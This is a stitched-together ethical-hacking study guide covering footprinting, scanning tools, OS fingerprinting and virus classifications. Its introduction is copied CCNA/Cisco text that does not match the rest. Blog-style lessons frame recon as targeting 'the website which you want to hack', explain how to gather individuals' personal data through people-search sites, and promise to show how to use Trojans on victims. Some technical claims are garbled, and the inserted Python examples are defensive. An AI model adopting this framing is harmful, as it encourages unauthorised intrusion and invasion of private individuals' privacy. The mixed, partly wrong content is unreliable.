
CERTIFIED ETHICAL HACKER

Study Guide

copyright 2016 EAPL

Introduction
Welcome to the exciting world of the Elysium certification program! You have picked up
this book because you want something better in your career, and Elysium is committed to
giving you better technology updates through it. You have made a good decision to pursue
career certification with Elysium: we can help you get your best networking job, or more
money and a promotion if you are already in the field. Cisco certification can also improve
your understanding of internetworking beyond Cisco products alone: you will develop a
complete understanding of networking and of how different network topologies work together
to form a network. This is beneficial to every networking job and is the reason Elysium
training is in such high demand, even at companies with few Cisco devices.

What Does this Book Cover?

This book covers everything you need to know in order to become CCNA certified.
However, taking the time to study and practice with routers or a router simulator is the
real key to success.
Most of the Hands-on Labs in the book assume that you have Cisco routers to work with.
If you don't, you can practice with simulators, and we will assist you in completing all of
the Hands-on Labs.


INTRODUCTION TO ETHICAL HACKING


Module Objectives
1. Overview of Current Security Trends
2. Understanding the Elements of Information Security
3. Understanding Information Security Threats and Attack Vectors
4. Overview of Hacking Concepts, Types, and Phases
5. Understanding Ethical Hacking Concepts and Scope

Attackers break into systems for various reasons and purposes. Therefore, it is important to
understand how malicious hackers exploit systems and the probable reasons behind the
attacks.
This module starts with an overview of the current security scenario and emerging threat
vectors, and provides an insight into the different elements of information security.

Module Flow
1. Information Security Overview
2. Information Security Threats and Attack Vectors
3. Hacking Concepts, Types, and Phases
4. Ethical Hacking Concepts and Scope
5. Information Security Controls
6. Information Security Laws and Standards

Information Security refers to protecting or safeguarding information, and the information
systems that use, store, and transmit it, from unauthorised access, disclosure,
alteration, and destruction.
Information is the critical asset that organizations need to secure. If sensitive information falls
into the wrong hands, the organization may suffer huge financial loss, loss of brand
reputation, loss of customers, and so on. To understand how to secure such critical
information resources, let us start with an overview of information security.

Case Study: Google Play Hack


Problem: Turkish hacker Ibrahim Balic brought down Google Play's entire system twice,
preventing developers from uploading new apps and updates to existing apps, and preventing
users from downloading content.
Cause:
Balic did not stop after that first attempt. He uploaded it again to confirm that it was his work
that had brought down the system. This resulted in a second DoS attack, once again causing the
database to crash. As a result, developers and users were unable to upload or download any
applications.

DIFFERENCE BETWEEN HACKER AND CRACKER


There are many articles on the internet about the difference between Hackers and Crackers. For many
years the media has erroneously used the word Hacker to mean a Cracker, so the general public now
believes a hacker is someone who breaks into computer systems, hacks passwords and websites, and
misuses them. This is absolutely untrue, and it demoralizes some of our most talented hackers.
You can judge the size of the misconception from the fact that the world's biggest authentic source,
WIKIPEDIA, has defined hackers in an incorrect way. Wikipedia has defined hackers in the following
way:
Hacking is unauthorized use of computer and network resources. (The term Hacker
originally meant a very gifted programmer. In recent years though, with easier access to
multiple systems, it now has negative implications.)

There is a very thin line between the hacker and the cracker. Just as a coin has two faces,
heads and tails, the same is true for computer experts: some use their techniques and expertise
to help others and secure systems or networks, and some misuse them for their own selfish
reasons.
There are several traditional ways of distinguishing hackers from crackers. In this book we
present them in order of their acceptance in the computer and IT market. First of all, here are
the basic definitions of hackers and crackers.

These definitions are as follows:

Hackers: A Hacker is a person who is extremely interested in exploring the inner (recondite)
workings of any computer or networking system. Most often, hackers are expert
programmers. They are also called Ethical Hackers or white hat hackers, and the
hacking they perform is called ethical hacking.
Ethical Hacking means you think like a hacker: first you hack the systems and find the
loopholes, then you try to correct those loopholes. These hackers protect the cyberworld
from every possible threat and fix security loopholes before they can be exploited. These
people are also called the GURUs of computer security.

Crackers: Crackers, also called Black Hat hackers, cheaters, or simply criminals, are
called criminals because they have the mindset of causing harm to security; they steal very
useful data and use it in wrong ways. Phishers also come in this category: they steal account
information, credit card numbers and money over the Net.
Below is the diagram which shows the basic difference between crackers (black hat hackers)
and hackers (ethical hackers or white hat hackers).

We hope this will help you clear up most of your doubts about hackers and crackers. And the
most important thing: until and unless an ethical hacker thinks like a cracker, you can never
become an expert ethical hacker, because to get the most out of any computer system you must
understand the mindset of crackers, what they can do and up to what level they can
damage.
Now, when you identify vulnerabilities and loopholes, if you fix them so that in future no one
can breach that same vulnerability, then you are a Hacker, ethical hacker or White Hat hacker;
if you exploit that loophole for misdeeds or for fun, then it is cracking or Black Hat hacking.
Black hat hackers are intelligent people, but criminals; cyber cops simply call them evil
geniuses.

BEST OPERATING SYSTEM FOR HACKERS

Most users are confused about which operating system is best for hackers and for hacking
activities such as cracking wireless network passwords, network sniffing, reverse
engineering, application hacking, and other encryption and spoofing tools.
The operating system we suggest here is BackTrack or Kali Linux.
You can also give the Matriux operating system and Knoppix a try. Matriux OS is awesome,
but it is still under construction, as its designers are still working on it and patching it.
Now let's discuss the functionality of the BackTrack operating system in more detail.

Best Operating System: Backtrack Linux

BackTrack is a Linux-based penetration testing arsenal that aids security professionals in
performing assessments in a purely native environment dedicated to hacking.
Whether you make BackTrack your primary operating system, boot it from a Live DVD, or
run it from your favourite thumb drive, BackTrack has been customized down to every
package, kernel configuration, script and patch solely for the purposes of the penetration tester.
BackTrack is intended for all audiences, from the most savvy security professionals to
newcomers to the information security field. BackTrack promotes a quick and easy way to
find and update the largest collection of security tools to date.
BackTrack is quite possibly the most comprehensive Linux distribution of security tools.
Both hackers and crackers can appreciate the features of this distribution. For black-hat
hackers, it provides easy access to software that facilitates exploitation of secured
systems and reverse engineering. For white-hatters, it is a penetration testing platform that finds
holes in a security scheme. See, everybody wins!
Major Features of BackTrack Linux

BackTrack features the latest in security penetration software. The current Linux
kernel is patched so that special driver installation is unnecessary for attacks. For
example, an Atheros-based wireless networking adapter will not enter monitor mode
or inject packets without the MadWiFi driver patch. With BackTrack, you don't need
to worry about that; it's plug-and-play, ready to go!
What's great is that this Linux distribution comes as a Live CD, so no installation is
needed. However, once you have experienced BackTrack, you will realize that it is a must to
download this operating system and install it on your laptop. At the very least,
download the VMware virtual appliance for BackTrack, and make sure you also install
VMware Tools for Linux. Many features will still work in VMware mode.

Based on: Debian, Ubuntu

Origin: Switzerland

Architecture: i386

Desktop: Fluxbox, KDE

Category: Forensics, Rescue, Live Medium

Cost: Free
Hacking Tools:
BackTrack provides users with easy access to a comprehensive and large collection of
security-related tools ranging from port scanners to password crackers. Support for
Live CD and Live USB functionality allows users to boot BackTrack directly from
portable media without requiring installation, though permanent installation to hard
disk is also an option.
BackTrack includes many well known security tools including:
Metasploit integration
RFMON injection-capable wireless drivers
Kismet
Nmap
Ettercap
Wireshark (formerly known as Ethereal)
BeEF (Browser Exploitation Framework)


A large collection of exploits as well as more commonplace software such as
browsers. BackTrack arranges tools into 11 categories:
Information Gathering
Network Mapping
Vulnerability Identification
Web Application Analysis
Radio Network Analysis (802.11, Bluetooth, RFID)
Penetration (Exploit & Social Engineering Toolkit)
Privilege Escalation
Maintaining Access
Digital Forensics
Reverse Engineering
Voice Over IP

CHAPTER 1 FOOT PRINTING


Footprinting and How It can be HelpFul to Hack systems


What Is FOOTPRINTING?
Basically, a footprint is the blueprint of the site/organisation/system that a hacker wants to hack,
i.e. its basic internal structure. Footprinting is the blueprint of the security profile of an
organization, undertaken in a methodological manner.
Footprinting is one of the three pre-attack phases; the others are scanning and enumeration.
Important thing to be noted: an attacker will spend 90% of the time in profiling an
organization and the other 10% in launching the attack.
Footprinting results in a unique organization profile with respect to the networks
(Internet/intranet/extranet/wireless) and systems involved. Doesn't it look amazing?
The most interesting stage of a targeted attack is the reconnaissance, or footprint analysis.
Here you use the web, search engines and whois.com to discover as much about the target as
possible. A whois.com lookup can tell you email address formats, for instance (first letter + last name @
company.com).
A Google search could reveal forum submissions by security personnel that reveal the brands
of firewall or antivirus in use at the target. Sometimes network diagrams are even found that
can guide an attack. The next stage, scanning, meant using special tools (I date myself by
mentioning Cybercop and Internet Security Scanner; these were the days before the open-source
Nessus) to discover open ports, services, and machines on the target network. And
then, finally, you could start attacking the various vulnerabilities that you had discovered.
SITES THAT HELP IN FOOTPRINTING!
1. www.whois.domaintools.com
Now, how it can help you to get info: I will show it through snapshots.


2. Now you can use this information to search for more about the person, simply using Google, as
shown in the next snapshot.

Now it is up to you how much information you want to explore about the person and website which
you want to hack.


I think you all will like this. We will continue our discussion on FOOTPRINTING tomorrow
also, as it is the most important phase.
We will explore more information in the next class. I will explain a few more interesting
facts and information-exploring techniques, so read on.
UNEARTHING BASIC INFORMATION
First of all, we will focus on unearthing the basic information about the site, i.e. the IP and
server information.
I will show you with the help of snapshots:
First go to START > RUN > type cmd > then type tracert www.websitename.com
Here we will use two basic commands in the command prompt (cmd): tracert
www.websitetobeanalysed.com
and ping www.websitename.com
It will look something like this:

We trace-routed www.amulive.com:
1. Shows our gateway of connectivity.
2. Shows our outgoing footprint IP (i.e. our IP that is being analyzed by the website).
3. Shows which service provider the connection passes through. I use BSNL but it shows
Airtel, because I prefer Airtel's DNS for quicker surfing.
The next steps show the IPs of the web servers through which amulive is being maintained.
After this we come to know the IP of the website and the IPs of the web servers it uses.
The website IP can be used to gather more information about the website.
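The three observations above (gateway, first hop outside the LAN, target address) can be read off a trace automatically. The following is an added example, not part of the original lesson: it parses Windows tracert output into hops and picks out those points. The sample trace is constructed from documentation address ranges; the hostname and addresses are not from any real trace.

```python
import ipaddress
import re

# Constructed sample of Windows "tracert" output for this example; the
# addresses are documentation/test ranges, not a real trace.
SAMPLE_TRACERT = """\
Tracing route to www.example.com [93.184.216.34]
over a maximum of 30 hops:

  1     1 ms     1 ms     1 ms  192.168.1.1
  2    12 ms    11 ms    12 ms  198.51.100.1
  3    14 ms    13 ms    14 ms  core1.isp.example [203.0.113.9]
  4     *        *        *     Request timed out.
  5    45 ms    44 ms    45 ms  93.184.216.34

Trace complete.
"""

# RFC 1918 private ranges, checked explicitly (ipaddress.is_private also
# flags documentation ranges, which would mislabel the sample hops).
RFC1918 = [ipaddress.ip_network(n)
           for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
IPV4_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")
HOP_RE = re.compile(r"^\s*(\d+)\s+(.*)$")


def is_rfc1918(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in RFC1918)


def parse_tracert(text):
    """Return [(hop_number, ip_or_None), ...]; None marks a timed-out hop."""
    hops = []
    for line in text.splitlines():
        m = HOP_RE.match(line)
        if not m:
            continue  # header, blank and "Trace complete." lines
        ips = IPV4_RE.findall(m.group(2))
        # "hostname [ip]" puts the address last; the bare form has one IP;
        # a "Request timed out." row has none.
        hops.append((int(m.group(1)), ips[-1] if ips else None))
    return hops


def summarize(text):
    """The observations the lesson reads off a trace, plus timed-out hops."""
    first_line = text.strip().splitlines()[0] if text.strip() else ""
    m = IPV4_RE.search(first_line)
    hops = parse_tracert(text)
    gateway = next((ip for _, ip in hops if ip and is_rfc1918(ip)), None)
    first_public = next((ip for _, ip in hops if ip and not is_rfc1918(ip)), None)
    return {
        "target": m.group(1) if m else None,
        # 1. our gateway of connectivity (first RFC 1918 hop)
        "gateway": gateway,
        # 2. first hop outside the LAN: the provider-side router; its owner
        #    can be checked with whois to identify the ISP (point 3)
        "first_public_hop": first_public,
        "hop_count": len(hops),
        "timeouts": [n for n, ip in hops if ip is None],
    }


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_TRACERT).items():
        print(f"{key}: {value}")
```

Note that tracert never prints your own public address: hop 2 is the ISP's router, and the address a remote website sees is that of your NAT gateway, which you find with a "what is my IP" service rather than from the trace.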


How to Find Personal Information About an Individual Over the Net?
It is one of the most important tasks. It is also helpful in finding fake profiles, but
unfortunately it is limited; still, we can use it to the fullest. There are two websites which
will help us:
1. http://people.yahoo.com (the best site to trace people for their personal information, and also
for reverse phone or mobile number lookup)

2. http://www.intellius.com (but this site is limited to the US only)

Sample Report from Intellius :


Satellite Picture of Joe's House from Intellius:

Now, using these sites, you will be able to collect the personal information of individuals
and also be able to identify fake profiles.

TOOLS NEEDED FOR FOOTPRINTING :

You can avoid the hectic work above by using this tool: SpiderFoot
Download link: http://www.binarypool.com/spiderfoot/
Information about SpiderFoot:

SpiderFoot is a free, open-source domain footprinting tool. Given one or more domain
names (and when I say domains, I'm referring to the DNS kind, not Windows domains), it
will scrape the websites on that domain, as well as search Google, Netcraft, Whois and DNS,
to build up information like:

Subdomains
Affiliates
Web server versions
Users (i.e. /~user)
Similar domains
Email addresses
Netblocks

ADDITIONAL FOOTPRINTING TOOLS :

Note: all these tools are freeware. You can easily Google them and download them.

Whois
Nslookup
ARIN
Neo Trace
VisualRoute Trace
SmartWhois
eMailTrackerPro
Website watcher
Google Earth
GEO Spider
HTTrack Web Copier
E-mail Spider

This is all about Footprinting. Now use the gathered information to build a basic,
detailed profile of the website/person.


CHAPTER 2 SCANNING NETWORKS


Scanning and Attacking Open Ports
In the Scanning part we will cover the following topics in detail:
~ Definition of scanning
~ Types and objectives of Scanning
~ Understanding Scanning methodology
~ Checking live systems and open ports
~ Understanding scanning techniques
~ Different tools present to perform Scanning
~ Understanding banner grabbing and OS fingerprinting
~ Drawing network diagrams of vulnerable hosts
~ Preparing proxies
~ Understanding anonymizers
~ Scanning countermeasures

What Is Scanning? And Why Do We Focus On It?

Scanning, as the name says, means that we scan something to find details about it.
Scanning basically refers to gathering the following four pieces of information;
we scan systems for four basic purposes:
To find the specific IP address
Operating system
System architecture
Services running on the system

The various types of scanning are as follows:
~ Port Scanning
~ Network Scanning
~ Vulnerability Scanning
I want to define these terms here, as they are of great use in the rest of the tutorial.
PORT SCANNING : There are 64k ports in a computer, out of which 1k are fixed for system
or OS services. In port scanning we scan for the open ports which can be used to attack the
victim computer.
In port scanning, a series of messages is sent to a computer to learn about the
computer's network services. Through this we will know which port we can use to attack
the victim.
Network Scanning : Network scanning is basically a procedure for finding the active hosts on
the network, i.e. we try to find whether a system is standalone or multiuser.
This is done either for the purpose of attacking them or for network security assessment, i.e.
how secure is the network?
Vulnerability Scanning : As the name says, in this type of scanning we scan the systems
to find vulnerabilities, i.e. weaknesses in the OS/database. Once we find a
vulnerability or loophole we can make the best use of it and attack the victim through it.
OBJECTIVES OF SCANNING
These are the primary objectives of scanning, i.e. why we scan:
~ To detect the live systems running on the network.
~ To discover which ports are active/running.
~ To discover the operating system running on the target system (fingerprinting).
~ To discover the services running on the target system.
~ To discover the IP address of the target system.
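Seen from the defender's side, the two scan types defined above leave distinct traces: a port scan hits many ports on one host (a "vertical" scan), a network scan hits one port across many hosts (a "horizontal" scan). The following added example, not part of the original lesson, runs a sliding-window detector over constructed firewall log lines in a simple format chosen here (not a real product's output); the thresholds are assumptions to tune per network.

```python
import re
from collections import defaultdict, namedtuple
from datetime import datetime, timedelta

# Constructed firewall log lines (format chosen for this example, not a real
# product's output; addresses are documentation ranges).
SAMPLE_LOG = """\
2016-03-01T10:00:01 DROP 203.0.113.5:40001 -> 192.0.2.10:21
2016-03-01T10:00:01 DROP 203.0.113.5:40002 -> 192.0.2.10:22
2016-03-01T10:00:02 DROP 203.0.113.5:40003 -> 192.0.2.10:23
2016-03-01T10:00:02 DROP 203.0.113.5:40004 -> 192.0.2.10:25
2016-03-01T10:00:03 DROP 203.0.113.5:40005 -> 192.0.2.10:80
2016-03-01T10:00:03 DROP 203.0.113.5:40006 -> 192.0.2.10:110
2016-03-01T10:00:04 DROP 203.0.113.5:40007 -> 192.0.2.10:143
2016-03-01T10:00:04 DROP 203.0.113.5:40008 -> 192.0.2.10:443
2016-03-01T10:00:05 DROP 203.0.113.5:40009 -> 192.0.2.10:445
2016-03-01T10:00:05 DROP 203.0.113.5:40010 -> 192.0.2.10:3389
2016-03-01T10:01:00 DROP 198.51.100.7:51000 -> 192.0.2.1:445
2016-03-01T10:01:00 DROP 198.51.100.7:51001 -> 192.0.2.2:445
2016-03-01T10:01:01 DROP 198.51.100.7:51002 -> 192.0.2.3:445
2016-03-01T10:01:01 DROP 198.51.100.7:51003 -> 192.0.2.4:445
2016-03-01T10:01:02 DROP 198.51.100.7:51004 -> 192.0.2.5:445
2016-03-01T10:01:02 DROP 198.51.100.7:51005 -> 192.0.2.6:445
2016-03-01T10:05:00 ACCEPT 192.0.2.77:55000 -> 192.0.2.10:443
2016-03-01T10:09:00 ACCEPT 192.0.2.77:55001 -> 192.0.2.10:443
"""

LINE_RE = re.compile(
    r"^(\S+)\s+(ACCEPT|DROP)\s+(\d+\.\d+\.\d+\.\d+):\d+\s+->\s+"
    r"(\d+\.\d+\.\d+\.\d+):(\d+)$"
)
Event = namedtuple("Event", "ts action src dst dport")


def parse_log(text):
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip lines in any other format
        ts, action, src, dst, dport = m.groups()
        events.append(Event(datetime.fromisoformat(ts), action, src, dst, int(dport)))
    return events


def detect_scans(text, window_seconds=60, port_threshold=8, host_threshold=5):
    """Map src -> set of ("vertical", dst) / ("horizontal", dport) findings.

    Both ACCEPT and DROP rows count: probes to open ports are accepted, and a
    scan is recognisable by its breadth, not by the firewall verdict.
    """
    by_src = defaultdict(list)
    for ev in parse_log(text):
        by_src[ev.src].append(ev)
    window = timedelta(seconds=window_seconds)
    findings = defaultdict(set)
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e.ts)
        start = 0
        for end in range(len(evs)):
            # slide the window start forward until it spans <= window_seconds
            while evs[end].ts - evs[start].ts > window:
                start += 1
            ports_per_dst = defaultdict(set)
            dsts_per_port = defaultdict(set)
            for ev in evs[start:end + 1]:
                ports_per_dst[ev.dst].add(ev.dport)
                dsts_per_port[ev.dport].add(ev.dst)
            for dst, ports in ports_per_dst.items():
                if len(ports) >= port_threshold:
                    findings[src].add(("vertical", dst))
            for dport, dsts in dsts_per_port.items():
                if len(dsts) >= host_threshold:
                    findings[src].add(("horizontal", dport))
    return dict(findings)


if __name__ == "__main__":
    for src, hits in detect_scans(SAMPLE_LOG).items():
        print(src, sorted(hits))
```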

We prefer to use TOOLS for this because they reduce our hectic work. The first tool
that we use is NMAP:
DOWNLOAD: http://nmap.org/dist/nmap-5.00-setup.exe


Features of NMAP :
~ Nmap is used to carry out port scanning, OS detection, version detection, ping sweeps, and
many other techniques.
~ It scans a large number of machines at one time.
~ It is supported by many operating systems.
~ It can carry out all types of port scanning techniques.
SECOND TOOL IS NET TOOLS 5.0.70 :
It is a collection of various networking tools, a must for beginners.
DOWNLOAD: http://www.softpedia.com/progDownload/Net-Tools-Download-22193.html

~ Net Tools Suite Pack is a collection of scanning tools.
~ This toolset contains tons of port scanners, flooders, web rippers, and mass e-mailers.
Note: Some of these tools may not work, but some are very good.


First of which is OS Fingerprinting

What is OS Fingerprinting?
OS fingerprinting is the method of determining the operating system that is running on the
target system.
The two different types of fingerprinting are:
Active stack fingerprinting
Passive fingerprinting
Active Stack Fingerprinting:
Based on the fact that OS vendors implement the TCP stack differently. Specially crafted
packets are sent to the remote OS and the responses are noted. The responses are then compared with
a database to determine the OS.
Passive Fingerprinting:
Passive banner grabbing refers to indirectly scanning a system to reveal its server's operating
system.
It is also based on the different implementations of the stack and the various ways an OS
responds.
It uses sniffing techniques instead of scanning techniques. It is less accurate than active
fingerprinting.
TOOL USED FOR OS FINGERPRINTING: p0f OS Fingerprinting Tool
DOWNLOAD:
http://lcamtuf.coredump.cx/p0f-win32.zip

P0f v2 is a versatile passive OS fingerprinting tool. P0f can identify the operating system on:
machines that connect to your box (SYN mode),
machines you connect to (SYN+ACK mode),
machines you cannot connect to (RST+ mode),
machines whose communications you can observe.

P0f can also do many other tricks, and can detect or measure the following:
firewall presence, NAT use (useful for policy enforcement),
existence of a load balancer setup,
the distance to the remote system and its uptime,
the other guy's network hookup (DSL, OC3, avian carriers) and his ISP.
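To make the passive method concrete, here is an added example (not p0f's code, and not from the original lesson) of how an observed SYN's TTL, window size and DF bit are matched against a signature table, and how the hop distance p0f reports falls out of the TTL. The signature table is an illustrative sketch constructed for this example (real p0f signatures carry many more fields), and the SYN records are constructed, not sniffer output.

```python
import re

# Illustrative signature table constructed for this example: initial TTL and
# window defaults for a few OS families. Real p0f signatures also use option
# order, MSS, timestamps and more, so treat this as a sketch of the idea.
SIGNATURES = [
    # (os_family, initial_ttl, window_sizes, df_bit_set)
    ("Linux",     64,  {5840, 14600, 29200, 64240}, True),
    ("Windows",   128, {8192, 65535, 64240},        True),
    ("Mac OS X",  64,  {65535},                     True),
    ("Cisco IOS", 255, {4128},                      False),
]
INITIAL_TTLS = (64, 128, 255)


def infer_initial_ttl(observed_ttl):
    """Each router decrements TTL by one, so the OS default is the next
    common initial value at or above what we observed."""
    for ttl in INITIAL_TTLS:
        if observed_ttl <= ttl:
            return ttl
    return None  # above 255 is not a valid IPv4 TTL


def fingerprint(ttl, window, df):
    """Guess the OS family and hop distance from the fields of one SYN.

    Distance = inferred initial TTL - observed TTL, which is the "distance to
    the remote system" figure p0f prints. Behind NAT or a load balancer the
    fields may belong to that device rather than the real client, which is
    why p0f also tries to flag NAT and load-balancer setups.
    """
    initial = infer_initial_ttl(ttl)
    distance = None if initial is None else initial - ttl
    for os_family, init_ttl, windows, df_flag in SIGNATURES:
        if init_ttl == initial and window in windows and df == df_flag:
            return {"os": os_family, "distance": distance, "initial_ttl": initial}
    return {"os": "unknown", "distance": distance, "initial_ttl": initial}


# Constructed SYN summaries in a key=value form chosen for this example.
SYN_RECORDS = """\
src=203.0.113.5 ttl=52 win=29200 df=1
src=198.51.100.7 ttl=118 win=8192 df=1
src=192.0.2.9 ttl=250 win=4128 df=0
src=192.0.2.33 ttl=60 win=1024 df=1
"""
REC_RE = re.compile(r"src=(\S+)\s+ttl=(\d+)\s+win=(\d+)\s+df=([01])")


def fingerprint_records(text):
    """Fingerprint every parsable record; returns {src: result}."""
    results = {}
    for line in text.splitlines():
        m = REC_RE.match(line)
        if m:
            src, ttl, win, df = m.groups()
            results[src] = fingerprint(int(ttl), int(win), df == "1")
    return results


if __name__ == "__main__":
    for src, result in fingerprint_records(SYN_RECORDS).items():
        print(src, result)
```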


What is Vulnerability?
As I told you in the first class, a vulnerability is a weakness in the network, system, database
etc. We can call a vulnerability a loophole, i.e. something through which the victim can be attacked. We
first analyze the loophole and then try to make the best use of it to hack the system of the victim,
organisation or website.
TOOLS THAT WE USE FOR VULNERABILITY SCANNING ARE :
1. Nessus
2. Retina
NESSUS
The Nessus vulnerability scanner is the world leader in active scanners, featuring high-speed
discovery, configuration auditing, asset profiling, sensitive data discovery and
vulnerability analysis of your security posture. Nessus scanners can be distributed throughout
an entire enterprise, inside DMZs, and across physically separate networks.


Features:
~ Plug-in-architecture
~ NASL (Nessus Attack Scripting Language)
~ Can test unlimited number of hosts simultaneously
~ Smart service recognition
~ Client-server architecture
~ Smart plug-ins
~ Up-to-date security vulnerability database

SAMPLE SNAPSHOT:


DOWNLOAD NESSUS :
http://www.nessus.org/download/

RETINA
Retina Network Security Scanner, the industry and government standard for multi-platform
vulnerability management, identifies known and zero-day vulnerabilities and provides
security risk assessment, enabling security best practices, policy enforcement, and regulatory
audits.

Features:
~ Retina network security scanner is a network vulnerability assessment scanner.
~ It can scan every machine on the target network, including a variety of operating system
platforms, networking devices, databases, and third party or custom applications.
~ It has the most comprehensive and up-to-date vulnerability database and scanning
technology.

SAMPLE SNAPSHOT:


DOWNLOAD RETINA:
http://www.eeye.com/html/products/retina/download/index.html

Now, after scanning the systems for vulnerabilities, we are going to attack the
systems, but before this we should know the risk. This risk can be reduced to a great extent by
using proxies. In the next class we will discuss what proxies are, how they work, how
they are going to help us, and some undetectable and untraceable proxy servers.

SCANNING AND ATTACKING OPEN PORTS


In my previous class I explained footprinting, i.e. getting the IP of the
person/website/organisation whom you want to attack and extracting the personal
information. You were all wondering what the use of that was; in this class you will
come to know why we went through the footprinting and analysis part.

I think that's enough for today. We will discuss more on scanning tomorrow; until then,
try these tools.
If you have any problem in using these tools, you can ask me; I will help you use
them.


INTRODUCTION TO TROJANS, VIRUSES AND BACKDOORS


Welcome back, guys. After a heavy, busy schedule I come with the next hacking tutorial. I
think everybody who uses a computer has faced the problem of viruses at least once in life.
In today's class I am going to introduce what Trojans, viruses, backdoors, worms etc. are,
and how they work to infect the system. In later classes we will discuss more about them,
like how to get rid of viruses and Trojans, how to remove them, and, most importantly,
how to use them for hacking victims' systems. So guys, keep reading.
Let's start with viruses: what are these and how do they work?

VIRUSES:
A virus is a self-replicating program that reproduces its own code by attaching copies of itself
to other executable code, such as executable files (.exe), dynamic link libraries (.dll), etc.
A virus generally operates in the background and, of course, without the user's consent, as
no one wants a virus to harm their computer. ROFL :P
Some well-known characteristics of viruses:
Resides in memory and replicates itself while the program it is attached to is
running
Does not reside in memory after the execution of the program
Can transform itself by changing its code to appear different

Hides itself from detection in three ways:

1. Encrypts itself into cryptic symbols (encodes itself with special characters)
2. Alters the disk directory data to compensate for the additional virus bytes (changes the
location of the file by adding one additional bit to the data location)
3. Uses stealth algorithms to redirect disk data
WORKING OF VIRUSES:
Generally most viruses work in two phases:
1. Infection Phase
2. Attack Phase
From the names you can get an idea of what these phases are.
1. Infection Phase:
Virus developers decide when to infect the host system's programs.
Some infect each time they are run and executed completely. Ex: direct viruses
Some virus code infects only when users trigger it, which may be a day, time, or
a particular event.
Ex: TSR viruses, which get loaded into memory and infect at later stages
2. Attack Phase:
Some viruses have trigger events to activate and corrupt systems
Some viruses have bugs which replicate and perform activities like file deletion and
increasing session time
They corrupt the targets only after spreading completely, as intended by their developers
It will be much clearer from the snapshot how the virus works:


Fig: Infection Phase: how the virus attaches itself to .exe files to infect programs.

Fig: Attack Phase: how files get fragmented and system speed slows down.


Why Do People Create Viruses?

I think everybody wonders why people create viruses and which people create
them. Hahaha, the real question that came to my mind when I was a newbie in this field.
Some of the most common reasons are discussed below:

Research projects (people doing research work detect the flaws in a particular
system and create code for that)
Pranks (just for fun, like us people who create viruses just to irritate friends)
Vandalism
To attack the products of specific companies (like Microsoft products:
XP, Vista, Windows 7 etc.)
To distribute political messages
Financial gain (stealing money from accounts etc.)
Identity theft
Spyware (to monitor the working of remote computers)

SYMPTOMS OF VIRUS ATTACKS:

Hey guys, below I have mentioned some symptoms that indicate that your system is
infected by viruses.

If the system acts in an unprecedented manner, you can suspect a virus attack; that
is, processes take more resources and are more time-consuming than before, i.e. the system hangs
frequently.
Some more are mentioned below:
If the computer beeps with no display
If one out of two anti-virus programs reports a virus on the system
If the label of the hard drive changes
Your computer freezes frequently or encounters errors
Your computer slows down when programs are started
You are unable to load the operating system
Files and folders are suddenly missing or their content changes
Your hard drive is accessed too often (the light on your main unit flashes rapidly)
Microsoft Internet Explorer freezes
Your friends mention that they have received messages from you, but you never sent
such messages


DIFFERENCE BETWEEN WORMS AND VIRUSES

Most of us thinks that worms are viruses and their working is similar to viruses but this not
the real scenario. There is a Big difference between the general viruses and Worms.
A worm is a special type of virus that can replicate itself and use memory, but cannot
attach itself to other programs. A worm spreads through the infected network
automatically but a virus does not.
How To Detect Your System is Infected by Virus??
This is one of the major question to answer and the simplest answer to it is that there are
some General Indications that Indicates that System is infected or Not.
General Indications are stated Below:

Programs take longer to load than normal (because virus halts the normal working of
programs as it attaches itself to it, so the execution time increases) .
Computers hard drive constantly runs out of free space.
Files have strange names which are not recognizable.
Programs act erratically (Programs Gives errors on use)
Resources are used up easily (can be Easily viewed using task manager).

HOW DOES A VIRUS INFECT THE SYSTEM?

Viruses infect the system in the following ways:
1. Loads itself into memory and checks for executables on the disk.
2. Appends the malicious code to a legitimate program which is important to the user.
3. Since the user is unaware of the replacement, he/she launches the infected program.
4. As a result of the infected program being executed, other programs get infected as
well.
5. The above cycle continues until the user realizes the anomaly within the system.


STAGES OF VIRUS LIFE CYCLE FROM DESIGN TO ELIMINATION

The life cycle indicated above is the general life cycle of a virus from the design phase to the
elimination phase.

VIRUS CLASSIFICATION: TYPES OF VIRUSES
Viruses are classified on the basis of two basic things:
1. What they infect
2. How they infect
Examples:
System Sector or Boot Virus:
- Infects disk boot sectors and records.
File Virus:
- Infects executables in the OS file system.
Macro Virus:
- Infects documents, spreadsheets and databases such as Word, Excel and Access.
Source Code Virus:
- Overwrites or appends host code by adding Trojan code to it.
Network Virus:
- Spreads itself via email by using the commands and protocols of a computer
  network.

Different Types of Virus and Worms Explained

System Sector Viruses


System sectors are special areas on your disk containing programs that are executed when you boot
(start) your PC. System sectors (Master Boot Record and DOS Boot Record) are often targets
for viruses. These boot viruses use all of the common viral techniques to infect and
hide themselves. They rely on an infected floppy disk left in the drive when the computer starts; they can
also be dropped by some file infectors or Trojans.

Stealth Virus
These viruses evade anti-virus software by intercepting its requests to the operating system.
A virus can hide itself by intercepting the anti-virus software's request to read the file and passing the
request to the virus instead of the OS. The virus can then return an uninfected version of the file to
the anti-virus software, so that it appears as if the file is clean.

Bootable CD-ROM Virus

These are a new type of virus that destroys the hard disk's data content when the system is booted with the infected
CD-ROM.
Example: Someone might give you a Linux bootable CD-ROM.
When you boot the computer using the CD-ROM, all your data is gone. No anti-virus can stop this,
because neither the AV software nor the OS is loaded when you boot from a CD-ROM.

Self-Modification Virus
Most modern antivirus programs try to find virus patterns inside ordinary programs by scanning them
for virus signatures.
A signature is a characteristic byte pattern that is part of a certain virus or family of viruses.
Self-modification viruses employ techniques that make detection by means of signatures difficult or
impossible. These viruses modify their code on each infection (each infected file
contains a different variant of the virus).

Polymorphic Code Virus

Polymorphic code is code that mutates while keeping the original algorithm intact. A well-written
polymorphic virus therefore has no parts that stay the same on each infection. To enable
polymorphic code, the virus has to have a polymorphic engine (also called a mutating engine or
mutation engine).

Metamorphic Virus
Metamorphic viruses rewrite themselves completely each time they are to infect new executables.
Metamorphic code is code that can reprogram itself by translating its own code into a temporary
representation, and then back to normal code again.
For example, W32/Simile consisted of over 14000 lines of assembly code, 90% of it part of the
metamorphic engine.

File Extension Virus


File extension viruses change the extensions of files. .TXT is safe as it indicates a pure text file. With
extensions turned off, if someone sends you a file named BAD.TXT.VBS you will only see BAD.TXT. If
